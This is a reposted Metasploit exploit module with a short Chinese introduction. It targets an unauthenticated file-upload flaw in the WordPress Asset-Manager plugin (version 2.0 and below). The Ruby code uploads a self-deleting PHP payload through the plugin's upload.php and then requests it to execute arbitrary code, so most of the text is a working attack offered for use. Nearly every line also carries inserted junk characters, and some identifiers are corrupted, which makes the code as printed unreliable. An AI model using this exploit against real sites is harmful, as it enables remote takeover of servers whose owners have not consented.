这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
2 E: h" e3 e5 f3 A4 \" Q4 g; Z0 z& }5 E. M* s5 t' w
##
, T5 Y) @2 J! v% Y8 j f# This file is part of the Metasploit Framework and may be subject to
5 s/ T2 ^- Z# r- ~2 ^* y7 U" N$ ?8 c# redistribution and commercial restrictions. Please see the Metasploit
! e4 N- D3 B9 S; d, b! {5 m# Framework web site for more information on licensing and terms of use.+ ?. f' I f% K. v- ]4 G
# http://metasploit.com/framework/$ u" W/ P& w* s1 d7 C: e# C
##' [; s/ ]! P w( S
. a3 l. Q5 ~' h
require 'msf/core'
+ L [ h5 q2 M8 b5 `% I& {* qrequire 'msf/core/exploit/php_exe'+ n! s4 _+ u+ i" `0 @
% Z& C$ ~ c. B" C2 Nclass Metasploit3 < Msf::Exploit::Remote; y9 p( x+ @7 F' H6 y$ _6 [
Rank = ExcellentRanking
8 P; B9 \8 m' O; `2 c* I5 s! \ m
7 I7 L0 @/ |% \' S6 Y X include Msf::Exploit::Remote::HttpClient
# {; g7 q& L, ^0 m1 s$ j include Msf::Exploit:hpEXE
; {! f9 @, Z( {
3 g8 c5 J r* }* a2 C def initialize(info = {})
0 J4 ^9 D$ O! D7 Q super(update_info(info,
* c/ a. j" k" [/ R. X 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
( ^& c' c2 D5 }( r. V, d# _ 'Description' => %q{
7 \/ R, e8 o1 I& i% B. { This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress/ M' y0 o. S* j7 n2 Z3 V3 y
plugin. By abusing the upload.php file, a malicious user can upload a file to a
% m( n$ { V" q temp directory without authentication, which results in arbitrary code execution.4 G# ]- h% i/ T, o! h
},
& e- M' E" b3 z9 c! Y& l" N 'Author' =>
. x4 P- r# x* G9 h, { [+ L! I& w) y* ^( g/ O6 C
'Sammy FORGIT', # initial discovery) P/ {- S3 s) ?0 @1 z
'James Fitts <fitts.james[at]gmail.com>' # metasploit module% u9 E6 N {% [3 {! i8 U
],( L: a$ j; K' k
'License' => MSF_LICENSE,
# ^: @( z7 K9 [5 n 'References' =>
) @8 K! ], D0 s! b- l2 u [$ H8 Q% \) r+ C7 U, U5 Q1 n$ h3 q
[ 'OSVDB', '82653' ],
! E8 r% z4 L& K0 k; S S) I- A4 h6 b [ 'BID', '53809' ],5 L. V& t! s+ \/ ~- Y4 Y
[ 'EDB', '18993' ],( j; Y; m* K+ z9 }9 t. A/ ^
[ 'URL', 'http:// www.myhack58.com /' ]
8 |; P. j( F: H/ ~/ x' q" x ],
2 ?! I- v$ S( g6 \+ ^, Z3 W 'Payload' =>
0 ?5 r6 s6 L% P8 X2 V {
- d6 s% v: p. H2 [! M 'BadChars' => "\x00",0 u2 G# J% h" d' Z
},# Z, D# ~' [9 L. C
'Platform' => 'php',6 |+ T7 k2 C) P2 p. E
'Arch' => ARCH_PHP,0 b" R; F) w, `" \$ U2 V. D
'Targets' => }/ p9 {: f' V9 J
[) H8 N- D0 h L
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],+ K: E6 V& g8 k- S+ W4 u
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 \: o2 J3 t; F6 z
],
# g6 U% C. m% W6 x0 ?' N* q1 l 'DefaultTarget' => 0,! D- Y% d& S& G- R% K
'DisclosureDate' => 'May 26 2012'))6 Y5 Z( D" a7 c" F) o+ G9 @
% L- o1 F0 @: F+ k$ b
register_options(
L1 R- l( A% r" Z% Z8 v5 O [ k1 e: S9 e% h9 o; f' X
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
* P3 Z7 I3 R% {( M& w6 K$ |8 ` ], self.class)& [& v( y) W: `7 k5 ?* r; g5 Q
end
+ r' O5 m* k# o$ ~5 d" y+ t* `7 o 3 v7 p4 u' p3 C5 t5 P* ~
def exploit
+ ^* D7 u3 U( r) m1 l% R+ X uri = target_uri.path
" Q% R# R3 T; N2 x8 n) R/ r uri << '/' if uri[-1,1] != '/'
; T3 F6 ?2 o8 S$ P' r1 Y: N peer = "#{rhost}:#{rport}", l( C5 j/ a/ Z; \/ Y$ l5 S
payload_name = "#{rand_text_alpha(5)}.php"$ |& B% c) K9 E D/ E1 b: K
php_payload = get_write_exec_payload(:unlink_self=>true)
6 ^8 G" f0 u% d& e , }$ b2 M R( ~; Y3 k( D: ]4 p* p& O
data = Rex::MIME::Message.new1 R7 \) f% O( O; h9 q7 f' j% o
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")7 `+ G- v/ A3 a g! |
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 w0 ?$ i, }+ y + D3 w5 p7 h B0 o% j
print_status("#{peer} - Uploading payload #{payload_name}")
1 e, |, A$ K# A res = send_request_cgi({
4 v( S! _' w/ n, h f 'method' => 'POST',8 { t! i) @ m8 ^% I L
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
) |0 ]1 B0 M* s2 n& T7 B" n 'ctype' => "multipart/form-data; boundary=#{data.bound}"," {1 c5 k% D1 Q
'data' => post_data2 i) c0 @3 w* F; |+ `3 d
})
1 }+ x, t- V& A 5 ~8 ~% l4 D: B
if not res or res.code != 200 or res.body !~ /#{payload_name}/
$ W, X+ \# s0 n9 G9 h$ T2 j fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")4 Z7 v' V2 X' @* g3 v- o; R+ a
end
: \8 d9 |3 `0 J7 H# A; c
4 X9 G, [$ l& |; c print_status("#{peer} - Executing payload #{payload_name}")8 b3 Q$ n7 z- G" M# D! G
res = send_request_raw({8 [( G0 ] y ?. [. ~5 o
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",! S8 o: O4 _ S
'method' => 'GET'
0 C) U) M( j0 j- y' {( U/ u })
9 X8 r, D# w& C+ { 5 J: k7 a- r" ?4 }( w
if res and res.code != 200
# `8 q1 }" [& K9 L$ c' G fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
( O& \. g% \8 g; A end
6 o- H* g, X* T# T end
+ B- x% f H/ aend: L9 L8 ^9 g5 X, n+ x! a3 w
|